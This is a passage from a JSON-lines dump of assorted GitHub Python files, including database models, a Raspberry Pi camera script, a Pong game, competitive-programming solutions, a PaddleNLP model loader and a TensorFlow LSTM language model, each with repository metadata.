net_status = Column(\"net_status\", String(1))\n        buy = Column(\"buy\", Integer)\n        sell = Column(\"sell\", Integer)\n        deviation = Column(\"deviation\", Integer)\n        date = Column(\"date\", DATE)\n\n        # securities_firm = relationship('SecuritiesFirm')\n\n    Base.metadata.create_all(engine)\n\n    return SecuritiesFirmLog \n\nclass Stocks(Base):\n    \n    __tablename__ = \"stocks\"\n\n    code = Column(\"code\", String(50), primary_key=True)\n    isin = Column(\"isin\", String(50)) \n    name = Column(\"name\", String(50))\n    market_category = Column(\"market_category\", String(50))\n    securities_category = Column(\"securities_category\", String(50))\n    industry = Column(\"industry\", String(50))\n    issue_date = Column(\"issue_date\", DATE)\n    cfi_code = Column(\"cfi_code\", String(50))\n    remark = Column(\"remark\", String(255))\n\n\ndef stocks_log_creator(tablename):\n\n    class StocksLog(Base):\n\n        __tablename__ = tablename\n\n        id = Column(\"id\", Integer, primary_key=True, autoincrement=True)\n        name = Column(\"name\", String(50))\n        code = Column(\"code\", String(50), index=True)\n        opening_price = Column(\"opening_price\", String(50))#opening price\n        highest_price = Column(\"highest_price\", String(50))#highest price\n        lowest_price = Column(\"lowest_price\", String(50))#lowest price\n        closing_price = Column(\"closing_price\", String(50))#closing price\n        change = Column(\"change\", String(50))#price change\n        trade_volume = Column(\"trade_volume\", BigInteger)#shares traded\n        trade_value = Column(\"trade_value\", BigInteger)#trade amount\n        transaction = Column(\"transaction\", Integer)#number of trades\n        taiwan_date = Column(\"taiwan_date\", String(50))\n        date = Column(\"date\", DATE)\n\n    Base.metadata.create_all(engine)\n\n    return StocksLog \n\n#create the tables (not created if they already exist)\n# SecuritiesFirmLogCreator(\"securities_firm_log\")\nBase.metadata.create_all(engine)\nDB_Session = sessionmaker(bind=engine)\nsession = DB_Session()\n\n\n","repo_name":"ryan19901222/stock-analysis","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"}
{"seq_id":"28030985348","text":"import picamera\nimport time\nimport subprocess\n\nwith picamera.PiCamera() as cam:\n    for i in range(1,10):\n        filename = \"test\" + format(i, \"03d\") + \".jpg\"\n        cam.capture(filename)\n        #subprocess.call([\"raspistill\", \"-n\", \"-t\", \"1\", \"-w\", \"200\",\n        #                 \"-h\", \"200\", \"-co\", \n        #                 \"90\", \"-ifx\", \"sketch\", \"-e\", \"jpg\",\n        #                 \"-e\", \"jpg\", \"-o\", filename])\n        print(\"taking photo\", i)\n\n    print(\"Encoding...\")\n    subprocess.call([\"avconv\", \"-r\", \"5\", \"-i\", \"test%03d.jpg\", \"-r\", \"24\", \"-s\", \"200x200\", \n                     \"-vsync\", \"cfr\" , \"out.h264\"])\n","repo_name":"Allenliu0703/pi2-workshop","sub_path":"pi_camera_ex1.py","file_name":"pi_camera_ex1.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"}
{"seq_id":"21336726590","text":"keyboard = ['qwertyuiop',\n'asdfghjkl',\n'zxcvbnm']\nkeyval = {}\nfor linenbr, line in enumerate(keyboard):\n    for index, letter in enumerate(line):\n        keyval[letter] = (linenbr, index)\ndef diff(a, b):\n    (x1, y1) = keyval[a]\n    (x2, y2) = keyval[b]\n    return abs(x1 - x2) + abs(y1- y2)\n\ndef count(w, orig):\n    cnt = 0\n    for index in range(len(orig)):\n        cnt += diff(w[index], 
orig[index])\n return cnt\n\nT = int(raw_input())\nfor t in range(T):\n word, cstr = raw_input().split()\n c = int(cstr)\n cand = [raw_input() for _ in range(c)]\n diffs = [(count(x,word), x) for x in cand]\n diffs.sort()\n for cnt, w in diffs:\n print('{} {}'.format(w, cnt))\n \n ","repo_name":"majstenmark/kattis","sub_path":"AirConditioned/keyboard.py","file_name":"keyboard.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"33240627644","text":"import pygame\nfrom sys import exit\nfrom pygame import mixer\n\n\ndef ball_animation():\n global ball_speed_x, ball_speed_y\n ball.x += ball_speed_x\n ball.y += ball_speed_y\n\n if ball.top <= 0 or ball.bottom >= screen_height:\n # ball_speed_y = ball_speed_y * -1 #reverse it\n ball_speed_y = -ball_speed_y\n if ball.left <= 0 or ball.right >= screen_width:\n # ball_speed_x = ball_speed_x * -1\n ball_speed_x = -ball_speed_x\n\n if ball.colliderect(player) or ball.colliderect(opponent):\n ball_speed_x = ball_speed_x * -1\n\n\ndef player_animation():\n player.y += player_speed\n if player.top <= 0:\n player.top = 0\n if player.bottom >= screen_height:\n player.bottom = screen_height\n\n\ndef opponent_ai():\n if opponent.top < ball.y:\n opponent.top += opponent_speed\n if opponent.bottom > ball.y:\n opponent.bottom -= opponent_speed\n if opponent.top <= 0:\n opponent.top = 0\n if opponent.bottom >= screen_height:\n opponent.bottom = screen_height\n\n\n#basic setup\npygame.init()\nscreen_width = 640\nscreen_height = 480\nscreen = pygame.display.set_mode((screen_width, screen_height))\npygame.display.set_caption('Pong Game')\nicon = pygame.image.load('Ball.png')\npygame.display.set_icon(icon)\nclock = pygame.time.Clock()\n\n#Game rectangles\nball = pygame.Rect(screen_width / 2 - 15, screen_height / 2 - 15, 30, 30) #left, right, top, bottom\nplayer = pygame.Rect(screen_width - 20, screen_height / 2 - 70, 10, 140)\nopponent = pygame.Rect(10, screen_height / 2 - 70, 10, 140)\n\nbg_color = pygame.Color('grey12')\nlight_grey = (200, 200, 200)\n\nball_speed_x = 7\nball_speed_y = 7\n\nplayer_speed = 0\nopponent_speed = 0\n\nwhile True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_q:\n exit()\n if event.key == pygame.K_DOWN:\n player_speed += 7\n if event.key == pygame.K_UP:\n player_speed -= 7\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_DOWN:\n player_speed -= 7\n if event.key == pygame.K_UP:\n player_speed += 7\n\n ball_animation()\n player_animation()\n opponent_ai()\n\n #Visuals\n screen.fill(bg_color)\n pygame.draw.rect(screen, light_grey, player)\n pygame.draw.rect(screen, light_grey, opponent)\n pygame.draw.ellipse(screen, light_grey, ball)\n pygame.draw.aaline(screen, light_grey, (screen_width / 2, 0), (screen_width / 2, screen_height))\n\n #updating the window\n pygame.display.update()\n clock.tick(60)\n\n\n#opponents top above ball: move down\n#opponents bottom below ball: move up\n#speed of opponent determines difficulty","repo_name":"praise002/pygame-projects","sub_path":"pong game/pong_game.py","file_name":"pong_game.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"13085350656","text":"\"\"\"Weather data file communication.\"\"\"\nimport logging\nimport json\n\nfrom helper.helper import isFloat\n\n\ndef 
setWeatherData(weatherForecast):\n    \"\"\"Write weather data to a file for inter-application communication.\n\n    Args:\n        weatherForecast (dictionary): town, temperature and humidity\n    \"\"\"\n    try:\n        fileName = '/tmp/WeatherData.txt'\n        logging.info(f'Writing weather data file {fileName}')\n        with open(fileName, 'w') as f_obj:\n            json.dump(weatherForecast, f_obj)\n    except Exception as ex:\n        logging.error(f'Unexpected error writing {fileName}: {ex!r}')\n        exit()\n\n\ndef getWeatherData():\n    \"\"\"Read weather data from a file for inter-application communication.\n\n    Returns:\n        list: town, temperature and humidity\n    \"\"\"\n    currTown = currTemp = currHumidity = None\n\n    try:\n        fileName = '/tmp/WeatherData.txt'\n        logging.info(f'Reading weather data file {fileName}')\n        with open(fileName, 'r+') as f_obj:\n            weatherForecast = json.load(f_obj)\n    except FileNotFoundError:\n        logging.exception('Can’t find {0}.'.format(fileName))\n        exit()\n    except Exception as ex:\n        logging.error(f'Unexpected error reading {fileName}: {ex!r}')\n        exit()\n    else:\n        logging.info(weatherForecast)\n\n    if 'town' in weatherForecast:\n        currTown = weatherForecast['town']\n\n    if 'temp' in weatherForecast and isFloat(weatherForecast['temp']):\n        currTemp = float(weatherForecast['temp'])\n\n    if 'humidity' in weatherForecast and \\\n            isFloat(weatherForecast['humidity']):\n        currHumidity = float(weatherForecast['humidity'])\n\n    return [currTown, currTemp, currHumidity]\n","repo_name":"gabrielh90/weather","sub_path":"helper/WeatherFileCommunication.py","file_name":"WeatherFileCommunication.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"}
{"seq_id":"2595391610","text":"# BOJ_2309 Seven Dwarfs\n\nlst = []\nfor _ in range(9):\n    lst.append(int(input()))\n\nlst.sort()\ntotal = sum(lst)\n\ncml = False\nfor i in range(len(lst) - 1):\n    for j in range(i + 1, len(lst)):\n        if total - lst[i] - lst[j] == 100:\n            lst.pop(j)\n            lst.pop(i)\n            cml = True\n            break\n    if cml:\n        break\n\nfor ls in lst:\n    print(ls)\n# print(*lst)\n","repo_name":"ChangMinL2E/dlckdals1004-naver.com","sub_path":"BOJ/BOJ_2309.py","file_name":"BOJ_2309.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"}
{"seq_id":"72912250127","text":"from mu.mel import ji\n\nimport functools\nimport operator\n\n\"\"\"This module implements harmonic functions.\n\nUnlike in traditional harmonic theory, these harmonic functions are\nnot tied to a specific chord, but rather to a specific pitch.\nEach mode has 3 main functions / pitches. Those are all pitches that can\nbe found in the GONG note of the corresponding mode.\nFor the mode x*y*z, the 3 main functions are:\n    o: x*y\n    w: x*z\n    m: y*z\nAdditionally every outer function, that's not part of the mode, is defined as:\n    n: U*z (connection between w and m)\n    ow: U*x (connection between o and w)\n    om: U*y (connection between o and m)\nU is the fourth prime number, that is not part of the current mode.\n\nEach of the inner functions (o, w, m) can be played simultaneously with the GONG.\nIn this case they are written in upper letters (O, W, M).\n\nAdditionally every function has two sidefunctions. Those sidefunctions\nhave the form a/b or b/a. 
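(A worked case, assuming a mode built from 3*5*7: the main function o is 3*5,
and its sidefunctions are the ratios 3/5 and 5/3.)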
They are named after their mother function\nplus the prime number, that remains stable.\nFor instance:\n    o: x*y\n    ox: x/y\n    oy: y/x\n\"\"\"\n\n\nclass Function(object):\n    \"\"\"Harmonic function, described by the two prime numbers it contains.\n\n    A harmonic function can be played with or without the gong.\n    Every harmonic function has two sidefunctions.\n    \"\"\"\n\n    def __init__(self, name: str, key, gong: bool) -> None:\n        self.__name = name\n        self.__key = key\n        self.__gong = gong\n\n    def __repr__(self) -> str:\n        return self.__name\n\n    def __eq__(self, other) -> bool:\n        try:\n            tests = (\n                self.gong == other.gong,\n                self.__key == other.__key,\n                type(self) == type(other),\n            )\n            return all(tests)\n        except AttributeError:\n            return False\n\n    def __hash__(self) -> int:\n        return hash(self.identity)\n\n    @property\n    def gong(self) -> bool:\n        return self.__gong\n\n    @property\n    def identity(self) -> tuple:\n        return self.__key.identifier\n\n    def __call__(self, mode) -> ji.JIPitch:\n        \"\"\"Return real pitch depending on the corresponding mode.\n\n        This pitch is in no specific octave yet.\n        \"\"\"\n        primes = functools.reduce(operator.mul, self.__key(mode))\n        if mode.gender:\n            return ji.r(primes, 1)\n        else:\n            return ji.r(1, primes)\n\n\nclass SideFunction(Function):\n    def __init__(self, name: str, key) -> None:\n        Function.__init__(self, name, key, False)\n        # Keep a local reference: name mangling makes Function's private\n        # __key attribute unreachable from this subclass's __call__.\n        self.__key = key\n\n    def __call__(self, mode):\n        \"\"\"Return real pitch depending on the corresponding mode.\n\n        This pitch is in no specific octave yet.\n        \"\"\"\n        primes = self.__key(mode)\n        if not mode.gender:\n            primes = tuple(reversed(primes))\n        return ji.r(primes[0], primes[1])\n\n\nclass Identifier(object):\n    \"\"\"Pair of mode attribute names that selects two primes from a mode.\n    \"\"\"\n\n    def __init__(self, p0: str, p1: str) -> None:\n        self.__identifier = (p0, p1)\n\n    @property\n    def identifier(self) -> tuple:\n        return self.__identifier\n\n    def __call__(self, mode) -> tuple:\n        \"\"\"Return the relevant prime numbers from the mode.\"\"\"\n        return tuple(getattr(mode, identity) for identity in self.__identifier)\n\n    def __eq__(self, other) -> bool:\n        try:\n            return self.identifier == other.identifier\n        except AttributeError:\n            return False\n\n\ndef __init_functions():\n    func_name_and_identifier = (\n        (\"m\", \"y\", \"z\"),  # tonica\n        (\"w\", \"x\", \"z\"),  # subdominant\n        (\"o\", \"x\", \"y\"),  # dominant\n        (\"n\", \"U\", \"z\"),\n        (\"om\", \"U\", \"y\"),\n        (\"ow\", \"U\", \"x\"),\n    )\n\n    functions = {}\n\n    for information in func_name_and_identifier:\n        name, p0, p1 = information\n        name_sf0 = name + p0\n        name_sf1 = name + p1\n        identifier = Identifier(p0, p1)\n        identifier_sf1 = Identifier(p1, p0)\n        to_update = {\n            name: Function(name, identifier, False),\n            name_sf0: SideFunction(name_sf0, identifier),\n            name_sf1: SideFunction(name_sf1, identifier_sf1),\n        }\n        if name in (\"m\", \"w\", \"o\"):\n            to_update.update(\n                {name.upper(): Function(name.upper(), identifier, True)}\n            )\n        functions.update(to_update)\n\n    return functions\n\n\nFUNCTIONS = __init_functions()\n","repo_name":"levinericzimmermann/nongkrong","sub_path":"nongkrong/harmony/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":4327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"}
{"seq_id":"14093191437","text":"import json\nimport os\nfrom typing import List, Tuple\n\nfrom paddlenlp.utils.downloader import COMMUNITY_MODEL_PREFIX, get_path_from_url\nfrom paddlenlp.utils.env import MODEL_HOME\nfrom paddlenlp.utils.log import logger\n\nCOMMUNITY_MODEL_CONFIG_FILE_NAME = \"community_models.json\"\n\n\ndef load_community_models() -> List[Tuple[str, str]]:\n    \"\"\"load community models based on remote models.json\n\n    Returns:\n        List[Tuple[str, str]]: the name tuples of community models\n    \"\"\"\n    # 1. check & download community models.json\n    local_community_model_config_path = os.path.join(MODEL_HOME, \"community_models.json\")\n\n    if not os.path.exists(local_community_model_config_path):\n        logger.info(\"download community model configuration from server ...\")\n        remote_community_model_path = \"/\".join([COMMUNITY_MODEL_PREFIX, COMMUNITY_MODEL_CONFIG_FILE_NAME])\n        cache_dir = os.path.join(MODEL_HOME)\n        local_community_model_config_path = get_path_from_url(remote_community_model_path, root_dir=cache_dir)\n\n    # 2. load configuration\n    #\n    # config = {\n    #     \"model_name\": {\n    #         \"type\": \"\",\n    #         \"files\": [\"\", \"\"]\n    #     }\n    # }\n    #\n\n    with open(local_community_model_config_path, \"r\", encoding=\"utf-8\") as f:\n        config = json.load(f)\n\n    model_names = set()\n    for model_name, obj in config.items():\n        model_names.add((model_name, obj.get(\"model_type\", \"\")))\n    logger.info(f\"find {len(model_names)} community models ...\")\n    return model_names\n","repo_name":"PaddlePaddle/PaddleNLP","sub_path":"paddlenlp/cli/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":10561,"dataset":"github-code","pt":"65"}
{"seq_id":"31824775662","text":"__author__ = \"Santiago Silva\"\n__copyright__ = \"Copyright 2018\"\n__description__ = \"\"\"\nCurvelet feature extraction. USAGE:\n    python3 plsr_analysis.py -s [number_of_scales] -a [number_of_angles]\n\"\"\"\n\nimport os\nimport gc\nimport sys\nimport argparse\nfrom tqdm import tqdm\nfrom os.path import join, dirname, realpath\n\nimport warnings\nwarnings.filterwarnings(\"ignore\", message=\"numpy.dtype size changed\")\n\ntry:\n    import pyct as ct\nexcept ImportError as e:\n    print('[ ERROR ] {}'.format(e))\n\nimport numpy as np\nimport pandas as pd\n\nroot = dirname(dirname(dirname(realpath(__file__))))\nsys.path.append(join(root))\n\nfrom lib.curvelets import clarray_to_gen_gaussian_dict\nfrom lib.path import get_file_list, mkdir\n\n\ndef main():\n    # Create Curvelet object for 360x180 px\n    A = ct.fdct2(\n        (360,180), \n        nbs=n_scales, \n        nba=n_angles, \n        ac=True, \n        norm=False, \n        vec=True, \n        cpx=False)\n\n\n    print('Processing subject ' + subject)\n    \n    # Set filename(s)\n    raw_folder = join(results_folder, subject, 'raw')\n    \n    # Initialize a feature dictionary per subject\n    f_dict = {}\n    f_dict['subject'] = subject\n    f_dict['target'] = label\n    f_dict['n_scales'] = n_scales\n    f_dict['n_angles'] = n_angles\n    \n    for r in tqdm(sphere_radius, desc='Sphere scale'):\n        # for r in sphere_radius:\n        # Get type of image and sphere params\n        raw_file = join(\n            raw_folder,\n            '%s_%03d_to_%03d_solid_angle_to_sphere.raw' % (\n                img_type, r, (r + delta)\n            ))\n        \n        # Load and do the magic!\n        try:\n            img = np.fromfile(raw_file, dtype=np.float).reshape([360, 180]).T\n        except:\n            print('No file found: ' + raw_file)\n            continue\n        \n        # Get a Curvelet decomposition\n        f = A.fwd(img)\n        print(f.shape)\n\n        # Convert data to dict\n        buff = clarray_to_gen_gaussian_dict(A, f, n_scales, n_angles, r)\n        f_dict.update(buff)\n        del buff, f, img\n\n    # Save subject results\n    subject_feats_file = join(output_subfolder, '%s.npz' % subject)\n    np.savez_compressed(subject_feats_file, **f_dict)\n\n    # Give permissions\n    os.system('chmod 777 ' + subject_feats_file)\n    os.system('chmod -R 777 ' + 
output_subfolder)\n\n\nif __name__ == '__main__':\n # --- ARG PARSING ---\n parser = argparse.ArgumentParser(description=__description__)\n parser.add_argument('-f', metavar='--folder',\n help='Subjects\\' folder.',\n default='/user/ssilvari/home/Documents/temp/sphere_mapped')\n parser.add_argument('-s', metavar='--scales',\n help='Number of scales.',\n type=int,\n default=6)\n parser.add_argument('-a', metavar='--angles',\n help='Number of angles (subbands) per scale.',\n type=int,\n default=8)\n parser.add_argument('-t', metavar='--type',\n help='type of image (intensity, gradient)',\n default='gradient')\n parser.add_argument('-subject', metavar='--type',\n help='Subject ID',\n default='002_S_0729')\n parser.add_argument('-label', metavar='--type',\n help='Label of patient (diagnosis)',\n default='MCIc')\n args = parser.parse_args()\n \n # --- MAIN ---\n # Set parameters\n n_scales = args.s\n n_angles = args.a\n img_type = args.t\n subject = args.subject\n label = args.label\n target = label == 'MCIc'\n results_folder = args.f\n\n output_folder = join(root, 'output')\n output_subfolder = join(output_folder, 'curv_feats_%s_nscales_%d_nangles_%d' % (img_type, n_scales, n_angles))\n \n try:\n os.mkdir(output_subfolder)\n except OSError:\n pass\n\n step = 25 # Propagation step\n delta = 25 # Sphere thickness\n sphere_radius = [i for i in range(0, 100, step)]\n\n # Start main\n main()","repo_name":"sssilvar/CSD-AD","sub_path":"test/trash/feature_extraction_individual.py","file_name":"feature_extraction_individual.py","file_ext":"py","file_size_in_byte":4036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"5412693311","text":"# Count unique paths with given sum in an N-ary Tree\r\n# Given an integer X and integer N, the task is to find the number of unique paths starting from the root in N - ary tree\r\n# such that the sum of all these paths is equal to X.The N - ary tree satisfies the following conditions:\r\n# All the nodes have N children and the weight of each edge is distinct and lies in the range[1, N].\r\n# The tree is extended up to the infinity.\r\n\r\n# Python3 program for the above approach\r\nmod = int(1e9 + 7)\r\n\r\n\r\n# Function for counting total\r\n# no of paths possible with\r\n# the sum is equal to X\r\ndef findTotalPath(X, n, dp):\r\n # If the path of the sum\r\n # from the root to current\r\n # node is stored in sum\r\n if (X == 0):\r\n return 1\r\n\r\n ans = 0\r\n\r\n # If already commputed\r\n if (dp[X] != -1):\r\n return dp[X]\r\n\r\n # Count different no of paths\r\n # using all possible ways\r\n for i in range(1, min(X, n) + 1):\r\n ans = ans + findTotalPath(X - i, n, dp) % mod;\r\n ans %= mod;\r\n\r\n # Return total no of paths\r\n dp[X] = ans\r\n return ans\r\n\r\n\r\n# Driver Code\r\nif __name__ == '__main__':\r\n n = 3\r\n X = 2\r\n\r\n # Stores the number of ways\r\n # to obtains sums 0 to X\r\n dp = [-1] * (X + 1)\r\n\r\n # Function call\r\n print(findTotalPath(X, n, dp))","repo_name":"Gaju27/Assignment_17_B","sub_path":"count_unique_path_in_nary_tree.py","file_name":"count_unique_path_in_nary_tree.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"15638572146","text":"from functions import *\n\nif __name__ == '__main__':\n file_students = 'students.json'\n file_professions = 'professions.json'\n\n data_students = load_students(file_students)\n data_professions = 
load_professions(file_professions)\n\n    user_pk = int(input('Enter the student number \n'))\n    '''get the user's pk input'''\n    student = get_student_by_pk(user_pk, data_students)\n\n    if student:\n        '''If such a student exists, print information about them'''\n        print(f'Student {student[\"full_name\"]}')\n        str_skills = ', '.join(student[\"skills\"])\n        print(f'Knows {str_skills}')\n    else:\n        '''If there is no such student, exit'''\n        print('We have no such student')\n        quit()\n\n    title = input('Choose a profession to evaluate the student \n')\n    '''Get the profession title input '''\n    profession = get_profession_by_title(title, data_professions)\n    '''Check that such a profession exists\nIf it does, get the match using check_fitness'''\n\n    if not profession:\n        '''If not, exit'''\n        print('We have no such profession')\n        quit()\n\n    data = check_fitness(student, profession)\n    print(show_result(data, student['full_name']))\n","repo_name":"klotzl/Homework_7","sub_path":"Homework_7/homework_7.py","file_name":"homework_7.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"}
{"seq_id":"11757364902","text":"import tensorflow as tf\nimport numpy as np\nimport time\n\nfrom PTBReader import *\n\n\nclass LSTMLanguageModel(object):\n    def __init__(self,hparams, mode):\n        #self.sess = sess\n        #self.summary_writer = summary_writer\n        self.hparams = hparams\n\n        print(self.hparams)\n        self.mode = mode\n\n        self.vocab_size = self.hparams.vocab_size\n\n        self.reader = PTBReader(data_dir=\"../data\",dataset_name=\"ptb\", vocab_size=10000)\n        self.initializer = tf.contrib.layers.xavier_initializer()\n        self.orthogonal_initializer = tf.orthogonal_initializer()\n\n    def define_graph(self):\n        filenames = [\"../data/ptb_train_0.tfrecords\"]\n        #batch_size = 10\n        min_after_dequeue = 1000\n\n        filename_queue = tf.train.string_input_producer(\n            filenames)\n        input_sequence, output_sequence, input_shape, output_shape = self.reader.read_tf_record_file(filename_queue)\n\n        input_seq_batch, output_seq_batch, input_shape_batch, output_shape_batch = tf.train.shuffle_batch(\n            [input_sequence, output_sequence, input_shape, output_shape], batch_size=self.hparams.batch_size,\n            capacity=min_after_dequeue * 3 + 1, min_after_dequeue=min_after_dequeue)\n\n        dense_input_seq_batch = tf.sparse_to_dense(sparse_indices=input_seq_batch.indices,\n                                                   output_shape=input_seq_batch.dense_shape,\n                                                   sparse_values=input_seq_batch.values,\n                                                   default_value=0,\n                                                   validate_indices=True,\n                                                   name=None)\n        dens_output_seq_batch = tf.sparse_to_dense(sparse_indices=output_seq_batch.indices,\n                                                   output_shape=output_seq_batch.dense_shape,\n                                                   sparse_values=output_seq_batch.values,\n                                                   default_value=0,\n                                                   validate_indices=True,\n                                                   name=None)\n\n        input_seq_lengths = tf.reshape(input_shape_batch, [self.hparams.batch_size])\n        output_seq_lengths = tf.reshape(output_shape_batch, [self.hparams.batch_size])\n\n        max_output_length = tf.reduce_max(output_seq_lengths)\n\n        self.y = tf.stack([dens_output_seq_batch[i] for i in range(self.hparams.batch_size)])\n\n\n        with tf.variable_scope(\"input_layer\") as current_scope:\n            self.embedding = tf.get_variable(\"embedding\", [self.vocab_size, self.hparams.number_of_hidden_units],\n                                             dtype=tf.float32,initializer=self.orthogonal_initializer)\n            embedded_inputs = [tf.nn.embedding_lookup(self.embedding, dense_input_seq_batch[i]) for i in range(self.hparams.batch_size)]\n            if self.mode == tf.contrib.learn.ModeKeys.TRAIN:\n                embedded_inputs = 
tf.nn.dropout(embedded_inputs, self.hparams.keep_prob)\n\n with tf.variable_scope(\"hidden_layer\"):\n self.cell, _ = self._get_lstm_cell()\n tf.logging.info(dense_input_seq_batch)\n tf.logging.info(input_seq_lengths)\n all_states, current_state = tf.nn.dynamic_rnn(inputs=embedded_inputs,\n cell=self.cell,\n sequence_length=input_seq_lengths,\n initial_state=None,\n time_major=False,\n scope=None,\n dtype=tf.float32)\n\n tf.logging.info(all_states)\n self.sequence_predictions = all_states\n tf.logging.info(self.sequence_predictions)\n for sp in tf.unstack(self.sequence_predictions):\n tf.logging.info(sp)\n\n with tf.variable_scope(\"output_projection\"):\n self.projection = tf.get_variable(name=\"output_projection\", shape=[self.hparams.number_of_hidden_units, self.vocab_size],dtype=tf.float32, initializer=self.orthogonal_initializer)\n self.projection_bias = tf.get_variable(name=\"output_projection_bias\", shape=[self.vocab_size],dtype=tf.float32, initializer=tf.zeros_initializer())\n self.projected_seq_predictions = [tf.add(tf.matmul(sp,self.projection),self.projection_bias) for sp in tf.unstack(self.sequence_predictions)]\n\n\n\n\n #cross_ent = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=self.projected_seq_predictions, labels=self.y)\n #tf.logging.info(cross_ent)\n \n tf.logging.info(self.sequence_predictions[:,-1])\n \n predictions = tf.concat(tf.unstack(self.sequence_predictions),axis=0)\n tf.logging.info(predictions)\n y = tf.concat(tf.unstack(self.y),axis=0)\n with tf.variable_scope(\"loss\"):\n nce_loss = tf.nn.nce_loss(weights=tf.transpose(self.projection),\n biases=self.projection_bias,\n inputs= predictions,#self.sequence_predictions[0],\n labels=tf.expand_dims(y,1),#self.y[0],1),\n num_sampled=20,\n num_classes=10000,\n num_true=1,\n sampled_values=None,\n remove_accidental_hits=False, partition_strategy='div', name='nce_loss')# for y,sp in zip(tf.unstack(self.y),tf.unstack(self.sequence_predictions))]\n\n\n self.train_loss = (tf.reduce_sum(nce_loss) /\n tf.cast(tf.reduce_sum(tf.stack(input_seq_lengths)),dtype='float32'))\n tf.logging.info(self.train_loss)\n tf.summary.scalar(\"nce_loss\", tf.reduce_mean(self.train_loss))\n self.cross_ent_loss = tf.reduce_sum(tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=tf.expand_dims(y,1),\n logits=self.projected_seq_predictions,\n name=\"cross_ent_loss\"))\n tf.summary.scalar(\"cross_ent_loss\", tf.reduce_mean(self.cross_ent_loss))\n self.perplexity = tf.exp(self.cross_ent_loss)\n tf.summary.scalar(\"perplexity\", tf.reduce_mean(self.perplexity))\n correct_prediction = tf.equal(self.y, tf.argmax(self.projected_seq_predictions, 2))\n self.accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\n tf.summary.scalar(\"accuracy\", self.accuracy)\n\n\n\n def _get_lstm_cell(self):\n cell = tf.contrib.rnn.LSTMBlockCell(self.hparams.number_of_hidden_units, forget_bias=0.0)\n\n # fw_cell = tf.contrib.rnn.ResidualWrapper(fw_cell)\n # bw_cell = tf.contrib.rnn.ResidualWrapper(bw_cell)\n\n if self.mode == tf.contrib.learn.ModeKeys.TRAIN:\n cell = tf.nn.rnn_cell.DropoutWrapper(cell, output_keep_prob=self.hparams.keep_prob)\n\n # elif self.mode == tf.contrib.learn.ModeKeys.EVAL:\n # else: #if self.mode == tf.contrib.learn.ModeKeys.INFER:\n stacked_cell = tf.contrib.rnn.MultiRNNCell([cell] * self.hparams.depth, state_is_tuple=True)\n\n initial_state = stacked_cell.zero_state(self.hparams.batch_size, tf.float32)\n\n return stacked_cell, initial_state\n\n\n def _define_train(self):\n \"\"\"warmup_steps = 
self.hparams.learning_rate_warmup_steps\n warmup_factor = self.hparams.learning_rate_warmup_factor\n \"\"\"\n \"\"\"print(\" start_decay_step=%d, learning_rate=%g, decay_steps %d, \"\n \"decay_factor %g, learning_rate_warmup_steps=%d, \"\n \"learning_rate_warmup_factor=%g, starting_learning_rate=%g\" %\n (self.hparams.start_decay_step, self.hparams.learning_rate, self.hparams.decay_steps,\n self.hparams.decay_factor, warmup_steps, warmup_factor,\n (self.hparams.learning_rate * warmup_factor ** warmup_steps)))\n \"\"\"\n self.global_step = tf.Variable(0, trainable=False)\n\n\n\n if self.mode == tf.contrib.learn.ModeKeys.TRAIN:\n starter_learning_rate = self.hparams.learning_rate\n self.learning_rate = tf.train.exponential_decay(starter_learning_rate, self.global_step,\n 1000, 0.96, staircase=True)\n #inv_decay = warmup_factor ** (\n # tf.to_float(warmup_steps - self.global_step))\n #self.learning_rate = tf.cond(\n # self.global_step < self.hparams.learning_rate_warmup_steps,\n # lambda: inv_decay * self.learning_rate,\n # lambda: self.learning_rate,\n # name=\"learning_rate_decay_warump_cond\")\n\n if self.hparams.optimizer == \"sgd\":\n self.learning_rate = tf.cond(\n self.global_step < self.hparams.start_decay_step,\n lambda: self.learning_rate,\n lambda: tf.train.exponential_decay(\n self.learning_rate,\n (self.global_step - self.hparams.start_decay_step),\n self.hparams.decay_steps,\n self.hparams.decay_factor,\n staircase=True),\n name=\"learning_rate\")\n self.optimizer = tf.train.GradientDescentOptimizer(self.learning_rate)\n tf.summary.scalar(\"learning_rate\", self.learning_rate)\n elif self.hparams.optimizer == \"adam\":\n assert float(\n self.hparams.learning_rate\n ) <= 0.001, \"! High Adam learning rate %g\" % self.hparams.learning_rate\n self.optimizer = tf.train.AdamOptimizer(learning_rate=self.learning_rate)\n\n\n\n\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n params = tf.trainable_variables()\n gradients = tf.gradients(\n self.train_loss,\n params,\n colocate_gradients_with_ops=self.hparams.colocate_gradients_with_ops)\n\n clipped_gradients, _ = tf.clip_by_global_norm(gradients, self.hparams.max_gradient_norm)\n #self.update = self.optimizer.minimize(self.train_loss,global_step=self.global_step)\n self.update = self.optimizer.apply_gradients(zip(clipped_gradients, params), global_step=self.global_step)\n\n self.graph_summery = 